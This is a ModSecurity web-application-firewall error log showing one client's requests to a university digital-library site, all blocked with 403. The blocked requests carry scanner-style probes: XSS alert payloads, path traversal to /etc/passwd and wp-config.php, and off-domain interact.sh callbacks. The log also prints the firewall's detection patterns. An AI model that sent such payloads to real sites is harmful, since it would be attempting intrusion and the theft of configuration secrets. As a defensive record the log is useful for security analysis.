[Tue Aug 29 11:51:30.703464 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:callback. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:callback: </script><img/src/onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15UsCo-f0AAAm7m-gAAAAE"]
[Tue Aug 29 11:51:31.561233 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Display_FAQ. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:Display_FAQ: </script><svg/onload=alert(document.cookie)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO15U8Co-f0AAAfWOFsAAAAL"]
[Tue Aug 29 11:51:34.366885 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')</ found within ARGS:id: \\x22><script>alert('2Ue0HEhxUkrmNh9pZggHjrmQ3SN')</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/jira/secure/BrowseProject.jspa"] [unique_id "ZO15VsCo-f0AAAmQ-zIAAAAb"]
[Tue Aug 29 11:51:34.703767 2023] [:error] [pid 2528] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:action. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:action: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO15VsCo-f0AAAngCTcAAAAP"]
[Tue Aug 29 11:51:34.908667 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:orderby. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:orderby: title\\x22><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wpdmpro/list-packages/"] [unique_id "ZO15VsCo-f0AAAnepL8AAAAK"]
[Tue Aug 29 11:51:34.927312 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15VsCo-f0AAAnepMAAAAAK"]
[Tue Aug 29 11:51:34.991896 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/webEdition/showTempFile.php"] [unique_id "ZO15VsCo-f0AAAnB5XEAAAAJ"]
[Tue Aug 29 11:51:35.555418 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15V8Co-f0AAAnd2@gAAAAI"]
[Tue Aug 29 11:51:39.676728 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/updating.jsp"] [unique_id "ZO15W8Co-f0AAAmQ-0sAAAAb"]
[Tue Aug 29 11:51:40.929140 2023] [:error] [pid 2538] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:darkmode. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:darkmode: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/bbs/new.php"] [unique_id "ZO15XMCo-f0AAAnqj64AAAAC"]
[Tue Aug 29 11:51:42.539608 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:fileList[0][title]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:fileList[0][title]: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php"] [unique_id "ZO15XsCo-f0AAAn0GWIAAAAa"]
[Tue Aug 29 11:51:44.568622 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"></script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22></script><script>alert(document.domain)</script>: \\x22></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO15YMCo-f0AAAnIlisAAAAV"]
[Tue Aug 29 11:51:45.653518 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:media. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:media: \\x22></script><script>alert(document.domain)</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/s3-video/views/video-management/preview_video.php"] [unique_id "ZO15YcCo-f0AAAnn1@QAAAAe"]
[Tue Aug 29 11:51:47.602998 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1<script found within ARGS:error: 1<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/atmail/index.php/admin/index/"] [unique_id "ZO15Y8Co-f0AAAnB5ZYAAAAJ"]
[Tue Aug 29 11:51:48.625737 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:src: <body onload=alert(1)>.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/themes/ambience/thumb.php"] [unique_id "ZO15ZMCo-f0AAAmQ-1QAAAAb"]
[Tue Aug 29 11:51:48.775624 2023] [:error] [pid 2534] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dew_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:dew_file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php"] [unique_id "ZO15ZMCo-f0AAAnmT3cAAAAd"]
[Tue Aug 29 11:51:49.560276 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/error"] [unique_id "ZO15ZcCo-f0AAAnIlkEAAAAV"]
[Tue Aug 29 11:51:51.529682 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS_NAMES:user_password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: user_password found within ARGS_NAMES:user_password: user_password"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/login/dologin"] [unique_id "ZO15Z8Co-f0AAAlUlmQAAAA0"]
[Tue Aug 29 11:51:51.655137 2023] [:error] [pid 2527] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22< found within ARGS:key: '>\\x22<svg/onload=confirm('xss')>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO15Z8Co-f0AAAnf3nAAAAAM"]
[Tue Aug 29 11:51:53.922041 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:size. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:size: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/parsi-font/css.php"] [unique_id "ZO15acCo-f0AAAm7nD8AAAAE"]
[Tue Aug 29 11:51:53.993418 2023] [:error] [pid 2538] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchstring. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '>\\x22</ found within ARGS:searchstring: '>\\x22</script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/search.htm"] [unique_id "ZO15acCo-f0AAAnqj9YAAAAC"]
[Tue Aug 29 11:51:54.609277 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:message. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:message: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15asCo-f0AAAm7nEIAAAAE"]
[Tue Aug 29 11:51:55.834523 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:table. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:table: event</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO15a8Co-f0AAAnGkMQAAAAR"]
[Tue Aug 29 11:51:56.589114 2023] [:error] [pid 2552] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:location. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )//\\x0a found within ARGS:location: \\x0djavascript:alert(1)//\\x0aaaaaa"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/rails/actions"] [unique_id "ZO15bMCo-f0AAAn40xcAAAAW"]
[Tue Aug 29 11:51:57.635456 2023] [:error] [pid 2535] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22\\x22></ found within ARGS:id: \\x22\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/zimbra/h/search"] [unique_id "ZO15bcCo-f0AAAnn1-MAAAAe"]
[Tue Aug 29 11:51:58.567211 2023] [:error] [pid 2528] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:cyclePeriod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:cyclePeriod: alert(document.domain)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "digilib.unla.ac.id"] [uri "/plugins/servlet/Wallboard/"] [unique_id "ZO15bsCo-f0AAAngCW0AAAAP"]
[Tue Aug 29 11:51:59.544340 2023] [:error] [pid 2500] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date-from. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:date-from: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/e-search/tmpl/date_select.php"] [unique_id "ZO15b8Co-f0AAAnEqUoAAAAO"]
[Tue Aug 29 11:51:59.591275 2023] [:error] [pid 2528] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://www.interact.sh found within TX:1: www.interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/echo-server.html"] [unique_id "ZO15b8Co-f0AAAngCXAAAAAP"]
[Tue Aug 29 11:52:01.569176 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:bundle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: '; found within ARGS:bundle: ';alert(document.domain);var ok='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/passwordreset"] [unique_id "ZO15ccCo-f0AAAnd3DIAAAAI"]
